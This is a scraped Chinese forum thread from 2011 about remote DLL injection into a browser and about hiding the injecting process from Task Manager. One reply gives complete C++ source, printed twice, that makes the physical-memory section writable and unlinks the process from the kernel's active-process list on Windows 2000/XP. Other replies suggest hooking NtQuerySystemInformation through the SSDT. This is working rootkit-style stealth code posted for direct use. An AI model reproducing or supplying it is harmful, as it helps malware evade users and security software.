dll远程注入的问题。 本帖最后由 groundhappy 于 2011-09-02 15:39:03 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 既然要注入一个特定进程,注入前自然要检查exe是否在,所以需要一个线程来轮询..2. LoadLibrary是动态加载,进程启动后也可以再动态加载dll 既然要注入一个特定进程,注入前自然要检查exe是否在,所以需要一个线程来轮询..学习 http://hi.baidu.com/43755979/blog/item/73b35eddcbaab7db8d1029e2.html希望对你有帮助~ Windows核心编程一书上有一章专门讲这个的,还算比较相信的,不妨看一下 利用Hook技术截获LoadLibrary函数。 那假设我要注入到IE浏览器里面。那我还是要先写一个exe来判断是否运行了IE来决定是否注入我的DLL啊。。那在任务管理器里面必定有我写的这个EXE的进程啊,,那又有什么隐藏意义可言,至少在我运行IE前在任务管理器里还是可以看到这个注入DLL的exe程序啊?? 确实需要一个exe进程,不过这个exe相对于那个dll来说被杀的可能性还是小的楼主也可以尝试下通过hook来隐藏下这个exe进程我觉得书上讲的不一定就是我们非要可以用这个来干什么事情了,只是介绍下这种方法吧,到后面通过自己知识的积累技术的提升结合其他方面来真正完成某件事 HOOK隐藏。。什么原理,,如何实现??。。3q 头文件:////////////////////////////////////////HideProcess.hBOOL HideProcess(); CPP源文件:///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#include<windows.h>#include<Accctrl.h>#include<Aclapi.h>#include"HideProcess.h"#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)typedef LONG NTSTATUS;typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;#define OBJ_INHERIT 0x00000002L#define OBJ_PERMANENT 0x00000010L#define OBJ_EXCLUSIVE 0x00000020L#define OBJ_CASE_INSENSITIVE 0x00000040L#define OBJ_OPENIF 0x00000080L#define OBJ_OPENLINK 0x00000100L#define OBJ_KERNEL_HANDLE 0x00000200L#define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );RTLINITUNICODESTRING RtlInitUnicodeString;ZWOPENSECTION ZwOpenSection;HMODULE g_hNtDLL = NULL;PVOID g_pMapPhysicalMemory = NULL;HANDLE g_hMPM = NULL;OSVERSIONINFO g_osvi;//---------------------------------------------------------------------------BOOL InitNTDLL(){ g_hNtDLL = LoadLibrary("ntdll.dll"); if (NULL == g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;}//---------------------------------------------------------------------------VOID CloseNTDLL(){ if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL); g_hNtDLL = NULL;}//---------------------------------------------------------------------------VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,NULL, &pDacl, NULL, &pSD); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }} //---------------------------------------------------------------------------HANDLE OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) return NULL; switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; //2k case 1: PhyDirectory = 0x39000; break; //xp default: return NULL; } RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) return NULL; g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,0x1000); if( g_pMapPhysicalMemory == NULL ) return NULL; return g_hMPM;}//---------------------------------------------------------------------------PVOID LinearToPhys(PULONG BaseAddress, PVOID addr){ ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr; PGDE = BaseAddress[VAddr>>22]; if (0 == (PGDE&1)) return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr;}//---------------------------------------------------------------------------ULONG GetData(PVOID addr){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &0xfffff000, 0x1000); if (0 == tmp) return 0; ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}//---------------------------------------------------------------------------BOOL SetData(PVOID addr,ULONG data){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp) return FALSE; tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE;}//---------------------------------------------------------------------------long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp){ ExitProcess(0); return 1 ;}//---------------------------------------------------------------------------BOOL YHideProcess(){// SetUnhandledExceptionFilter(exeception); if (FALSE == InitNTDLL()) return FALSE; if (0 == OpenPhysicalMemory()) return FALSE; ULONG thread = GetData((PVOID)0xFFDFF124); //kteb ULONG process = GetData(PVOID(thread + 0x44)); //kpeb ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } if (1 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); CloseHandle(g_hMPM); CloseNTDLL(); return TRUE;}BOOL HideProcess(){static BOOL b_hide = false;if (!b_hide){ b_hide = true; YHideProcess(); return true;}return true;} 然后在需要隐藏进程的时候#incoude"HideProcess.h",调用HideProcess()即可。 写驱动hook ssdt的NtQuerySystemInformation可以实现不过这又要加载驱动了r3下也可以Hook NtQuerySystemInformation不过麻烦多了建议楼主去看下api拦截的东西 error C2440: “=”: 无法从“DeviceInfoList *”转换为“LPCWSTR” 奇怪问题: 新建MDI程序,然后改变视图为基于FormView类的试图后,改视图接收不到鼠标消息?? 救我啊,谢谢!!!!旋转好的图片无法保存!!! 关于Mailbox名称的编码 高分求救:关于视频文件的问题 如何制作UNICODE版程序 Smart card logon wininet提交请求10分钟失效问题 一个关于位图的问题! matlab 一个对话框里,按下一个按钮,实现关闭自身再重新打开,有办法吗? 在做一个动态库时,有以下三个选项,它们有何不同?
希望对你有帮助~
楼主也可以尝试下通过hook来隐藏下这个exe进程我觉得书上讲的不一定就是我们非要可以用这个来干什么事情了,只是介绍下这种方法吧,到后面通过自己知识的积累技术的提升结合其他方面来真正完成某件事
//HideProcess.h
BOOL HideProcess();
CPP源文件:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>#include"HideProcess.h"#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)typedef LONG NTSTATUS;typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
g_hNtDLL = LoadLibrary("ntdll.dll"); if (NULL == g_hNtDLL)
return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,"RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
if(NULL != g_hNtDLL)
FreeLibrary(g_hNtDLL); g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,NULL, &pDacl, NULL, &pSD); if(ERROR_SUCCESS != dwRes)
{ if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
} EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if(ERROR_SUCCESS != dwRes)
{ if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
if(ERROR_SUCCESS != dwRes)
{ if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}}
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion)
return NULL; switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
} RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
} if(!NT_SUCCESS(status))
return NULL; g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,0x1000); if( g_pMapPhysicalMemory == NULL )
return NULL; return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
PGDE = BaseAddress[VAddr>>22]; if (0 == (PGDE&1))
return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
} return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &0xfffff000, 0x1000);
if (0 == tmp)
return 0; ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp); return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (0 == tmp)
return FALSE; tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp); return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception); if (FALSE == InitNTDLL())
return FALSE; if (0 == OpenPhysicalMemory())
return FALSE; ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData(PVOID(thread + 0x44)); //kpeb ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
} if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw); CloseHandle(g_hMPM);
CloseNTDLL(); return TRUE;
}BOOL HideProcess()
{
static BOOL b_hide = false;
if (!b_hide)
{
b_hide = true;
YHideProcess();
return true;
}
return true;
}
然后在需要隐藏进程的时候#incoude"HideProcess.h",调用HideProcess()即可。
不过这又要加载驱动了
r3下也可以Hook NtQuerySystemInformation不过麻烦多了建议楼主去看下api拦截的东西